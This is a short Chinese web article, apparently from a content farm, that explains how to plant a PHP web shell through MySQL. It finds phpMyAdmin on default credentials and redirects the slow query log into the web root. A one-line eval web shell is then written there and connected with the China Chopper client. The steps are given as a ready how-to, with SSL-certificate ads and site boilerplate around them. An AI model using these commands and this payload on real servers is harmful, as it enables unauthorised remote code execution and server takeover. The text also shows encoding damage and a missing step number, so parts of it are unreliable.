如何利用sql語句寫入shell,相信很多沒有經(jīng)驗(yàn)的人對(duì)此束手無策,為此本文總結(jié)了問題出現(xiàn)的原因和解決方法,通過這篇文章希望你能解決這個(gè)問題。
海棠ssl適用于網(wǎng)站、小程序/APP、API接口等需要進(jìn)行數(shù)據(jù)傳輸應(yīng)用場景,ssl證書未來市場廣闊!成為創(chuàng)新互聯(lián)建站的ssl證書銷售渠道,可以享受市場價(jià)格4-6折優(yōu)惠!如果有意向歡迎電話聯(lián)系或者加微信:028-86922220(備注:SSL證書合作)期待與您的合作!
目標(biāo)ip:192.168.52.143
一、御劍掃描該地址
獲取到重要信息:
1、網(wǎng)站的絕對(duì)路徑
2、phpmyadmin,并且是默認(rèn)賬號(hào)密碼:root
解決方法:
1、設(shè)置slow_query_log=1 啟用慢查詢?nèi)罩尽?/p>
2、修改slow_query_log_file日志文件的絕對(duì)路徑以及文件名
set global slow_query_log_file='c:/phpstudy/www/xx.php'
3、向日志文件寫入一句話
select '<?php eval($_POST[x]);?>' or sleep(11)
三、用菜刀鏈接
看完上述內(nèi)容,你們掌握如何利用sql語句寫入shell的方法了嗎?如果還想學(xué)到更多技能或想了解更多相關(guān)內(nèi)容,歡迎關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道,感謝各位的閱讀!
網(wǎng)頁名稱:如何利用sql語句寫入shell
文章地址:http://jinyejixie.com/article18/gpssgp.html
成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供品牌網(wǎng)站制作、網(wǎng)站改版、App設(shè)計(jì)、網(wǎng)站建設(shè)、網(wǎng)頁設(shè)計(jì)公司、外貿(mào)網(wǎng)站建設(shè)
聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請(qǐng)盡快告知,我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場,如需處理請(qǐng)聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來源: 創(chuàng)新互聯(lián)